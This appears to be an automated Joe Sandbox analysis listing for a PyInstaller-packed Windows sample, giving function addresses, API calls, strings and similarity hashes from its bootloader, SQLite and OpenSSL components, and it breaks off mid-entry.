Function 00007FF6BA3A80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6BA3A80FF
GetWindowLongPtrW.USER32 ref: 00007FF6BA3A817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6BA3A8192
GetLastError.KERNEL32 ref: 00007FF6BA3A819C
SetWindowLongPtrW.USER32 ref: 00007FF6BA3A81B3

Strings

Needs to remove its temporary files., xrefs: 00007FF6BA3A8185

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: ab9ab2aeca0955af9e50b44400376c0dd281076800e2608d19f9f39d0c93aeae
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 57215E21B09B9282EB458F7EEC54179A255EF89B91F5842B1DF2DC33D8EE2CD9918301

Function 00007FFDFA932940 Relevance: 15.2, APIs: 10, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDFA932968
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDFA9329BA
_RTC_Initialize.LIBCMT ref: 00007FFDFA9329E8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDFA932A0E
__scrt_release_startup_lock.LIBCMT ref: 00007FFDFA932A39

Memory Dump Source

Source File: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true

Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
Instruction ID: 2076e6fe45f1a4881743f9dd02842a537207f6e1e2323fc88133d1ff2ddfcb21
Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
Instruction Fuzzy Hash: 9C818020F0C34346FB6C9B659461A7A62B8AF65780FD481B5DA6DC73DEDE3CE8C58600

Function 00007FF6BA3B6290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B62D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B66C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B695C

Strings

p, xrefs: 00007FF6BA3B6385
p, xrefs: 00007FF6BA3B63FD
:, xrefs: 00007FF6BA3B648C
f, xrefs: 00007FF6BA3B63F5
-, xrefs: 00007FF6BA3B6369

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 995b986fa2bc530a268c0c6c8c70c7746d8f1f98b51ea4c9cbc478e9120973be
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 6412A372E0DA4386FB609A18D1546B97693FB90750FC84275EF99C6AC6DF3CE9C08B04

Function 00007FF6BA3B0FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B1008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B13D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B166F

Strings

f, xrefs: 00007FF6BA3B10A0
f, xrefs: 00007FF6BA3B1255
p, xrefs: 00007FF6BA3B10AD
p, xrefs: 00007FF6BA3B1112
f, xrefs: 00007FF6BA3B110A

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 8c27b6437f13957938516a7d95ec290f834523c6593082ac5e06af5676ee2df1
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 91127362E1C94386FB609A18E0547B976A3FB40750FD44277EF9AC6AC8DF7CE5848B10

Function 00007FFDFB122070 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB12210A

Strings

%s %T already exists, xrefs: 00007FFDFB1222AD
table, xrefs: 00007FFDFB1221A5
sqlite_master, xrefs: 00007FFDFB12208F, 00007FFDFB1221F2, 00007FFDFB122544
view, xrefs: 00007FFDFB12219E, 00007FFDFB1222B4
there is already an index named %s, xrefs: 00007FFDFB12231E
sqlite_temp_master, xrefs: 00007FFDFB1220C9, 00007FFDFB1221CD
temporary table name must be unqualified, xrefs: 00007FFDFB12213E

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 2142204133-2846519077
Opcode ID: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
Instruction ID: 522cda227e5843009c194cbc66bcfaed5d63b5bc12888e812134ea63d0da0ada
Opcode Fuzzy Hash: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
Instruction Fuzzy Hash: E902AD62F0A68386EB24EB219520BAD3B91FB85B88F444235DE6D077E9DF3CE551C740

Function 00007FFDFB0D0A30 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

Download Yara Rule

APIs

new[].MSPDB140-MSVCRT ref: 00007FFDFB0D0B47

Strings

winFullPathname1, xrefs: 00007FFDFB0D0B2C
?, xrefs: 00007FFDFB0D0A71
:, xrefs: 00007FFDFB0D0A61
:, xrefs: 00007FFDFB0D0A9C
\, xrefs: 00007FFDFB0D0AB8
winFullPathname2, xrefs: 00007FFDFB0D0BB5
%s%c%s, xrefs: 00007FFDFB0D0AA6

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: new[]
String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
API String ID: 4059295235-3840279414
Opcode ID: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
Instruction ID: 2bca4a7a2bd7d9875c8146458c6debcd1194685ba88fcaddfe3a11fc4b3bc1cc
Opcode Fuzzy Hash: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
Instruction Fuzzy Hash: 28510551F0E28345FB259B256831EB96B91BF4AB88F484132ED6D436EEEF3CE4459304

Function 00007FF6BA3A1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

malloc, xrefs: 00007FF6BA3A110F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6BA3A1108
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6BA3A1098
fseek, xrefs: 00007FF6BA3A10D3
fread, xrefs: 00007FF6BA3A11FD
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6BA3A10CC
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6BA3A11F6

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: fe3ce30ccacf8a50be5b66d9247a717e39d867eba63eb2cc5dedf88405610c38
Instruction ID: ddd9ce5b82b5e67d2b8fe833a4eb0fd5dee940a530c7c2aa4600046e4a4623f0
Opcode Fuzzy Hash: fe3ce30ccacf8a50be5b66d9247a717e39d867eba63eb2cc5dedf88405610c38
Instruction Fuzzy Hash: 8B41C021B0866682EE10DB1AE8406BE6392FF44BC0F8445B3EF0DC7796EE3CE5468700

Function 00007FF6BA3A8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A8704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A870A
CreateDirectoryW.KERNEL32(?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A874C

Part of subcall function 00007FF6BA3A8830: GetEnvironmentVariableW.KERNEL32(00007FF6BA3A388E), ref: 00007FF6BA3A8867
Part of subcall function 00007FF6BA3A8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6BA3A8889

Part of subcall function 00007FF6BA3B8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B8251

Part of subcall function 00007FF6BA3A2810: MessageBoxW.USER32 ref: 00007FF6BA3A28EA

Strings

TMP, xrefs: 00007FF6BA3A86C2
TMP, xrefs: 00007FF6BA3A869C, 00007FF6BA3A87A3
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6BA3A86DC
_MEI%d, xrefs: 00007FF6BA3A8712
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6BA3A877E

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction ID: 61b2a6dd6bf71dfa59745e520b0f1c7072ed433f21a655892ed23786ae15a234
Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction Fuzzy Hash: 97417021A19A6244FE50AB6DE8552BD2296AF847C0F8441B2EF0DC77DAEE3CE605C340

Function 00007FFDFB0D2CE0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 339COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0D309A

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0D2D53, 00007FFDFB0D2EE9
%s at line %d of [%.10s], xrefs: 00007FFDFB0D2E95, 00007FFDFB0D2F02
misuse, xrefs: 00007FFDFB0D2E89, 00007FFDFB0D2EF6
API called with finalized prepared statement, xrefs: 00007FFDFB0D2E5C, 00007FFDFB0D2ED8
ATTACH x AS %Q, xrefs: 00007FFDFB0D2D70
API called with NULL prepared statement, xrefs: 00007FFDFB0D2E44

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
API String ID: 2142204133-1404302391
Opcode ID: c816f0f94f48910cad20fe28f8d79b4ef0e17281c282a94227bcaf6de0425057
Instruction ID: dee3b49717c43738f845b8e74ed42333c42a0783b28af7898ce5401a50249c55
Opcode Fuzzy Hash: c816f0f94f48910cad20fe28f8d79b4ef0e17281c282a94227bcaf6de0425057
Instruction Fuzzy Hash: B9F18C25B0AA4385FB649B219860B7977A4FF8AB84F444135EE6D877F8CF3CE445A300

Function 00007FFDFAAC7250 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 327COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAAC73CA
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAAC75E9
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAAC7623

Strings

SECLEVEL=, xrefs: 00007FFDFAAC7619
STRENGTH, xrefs: 00007FFDFAAC75DF
..\s\ssl\ssl_ciph.c, xrefs: 00007FFDFAAC7667, 00007FFDFAAC76E9
ssl_cipher_process_rulestr, xrefs: 00007FFDFAAC7660, 00007FFDFAAC76DD

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
API String ID: 4069847057-331183818
Opcode ID: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
Instruction ID: 8b0fd8f1e5e0c8837728e75e8ae2015a81df1f648fd6a42e3b0042b94fb98154
Opcode Fuzzy Hash: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
Instruction Fuzzy Hash: 1DD1D372B0C68246F7698B19D460B7976F0FB44780F5540B5EAAE977DCDE3CE84A8B00

Function 00007FF6BA3AEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6BA3AEA65

Part of subcall function 00007FF6BA3AF9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF6BA3AF9FF
Part of subcall function 00007FF6BA3AF9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6BA3AFA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6BA3AEB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6BA3AED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6BA3AEE98

Strings

csm, xrefs: 00007FF6BA3AEB60
csm, xrefs: 00007FF6BA3AEA7F
csm, xrefs: 00007FF6BA3AEAE6

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: ea9230b47db99563a686b8970f9a434c8d928fa84b8169c817ba5e016dbbe272
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 75D17F32A08B618AEF209B69D4413AD77A1FB55788F200175EF8DD7B96DF38E495C700

Function 00007FFDFAAB2536 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 214COMMON

Download Yara Rule

APIs

00007FFE20033420.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FFDFAAC1BA1
GetLastError.KERNEL32 ref: 00007FFDFAAC1D06

Strings

SSL_add_file_cert_subjects_to_stack, xrefs: 00007FFDFAAC1D65
..\s\ssl\ssl_cert.c, xrefs: 00007FFDFAAC1CFA, 00007FFDFAAC1D33, 00007FFDFAAC1D71, 00007FFDFAAC1DBF
calling OPENSSL_dir_read(%s), xrefs: 00007FFDFAAC1D0F
SSL_add_dir_cert_subjects_to_stack, xrefs: 00007FFDFAAC1CEE, 00007FFDFAAC1D27, 00007FFDFAAC1DB3
%s/%s, xrefs: 00007FFDFAAC1B81

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E20033420ErrorLast
String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
API String ID: 1442048445-502574948
Opcode ID: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
Instruction ID: e7d12cff03be5bcc41f816b426903dca5c4914498d6c0649c3353fa4a3650644
Opcode Fuzzy Hash: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
Instruction Fuzzy Hash: 02919361B1C68241FB6AAB11E431BBA6390FF85784F8140B6EE7D477DEDE3CE4468610

Function 00007FF6BA3BED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6BA3BF0AA,?,?,0000025066049748,00007FF6BA3BAD53,?,?,?,00007FF6BA3BAC4A,?,?,?,00007FF6BA3B5F3E), ref: 00007FF6BA3BEE8C
GetProcAddress.KERNEL32(?,?,?,00007FF6BA3BF0AA,?,?,0000025066049748,00007FF6BA3BAD53,?,?,?,00007FF6BA3BAC4A,?,?,?,00007FF6BA3B5F3E), ref: 00007FF6BA3BEE98

Strings

api-ms-, xrefs: 00007FF6BA3BEDD6
ext-ms-, xrefs: 00007FF6BA3BEDE9

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 2401af859a48643a1efddb18fd409e2d207b16f6385c28e8799082d3e391b860
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: B241C422B19B1291EA16CB1EAC005796396BF49B90F988679DF1EC7784EF3CE445D300

Function 00007FF6BA3A2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
MessageBoxW.USER32 ref: 00007FF6BA3A2D99

Strings

%ls: , xrefs: 00007FF6BA3A2D22
[PYI-%d:ERROR] , xrefs: 00007FF6BA3A2CA6
Error, xrefs: 00007FF6BA3A2D8C
<FormatMessageW failed.>, xrefs: 00007FF6BA3A2D70

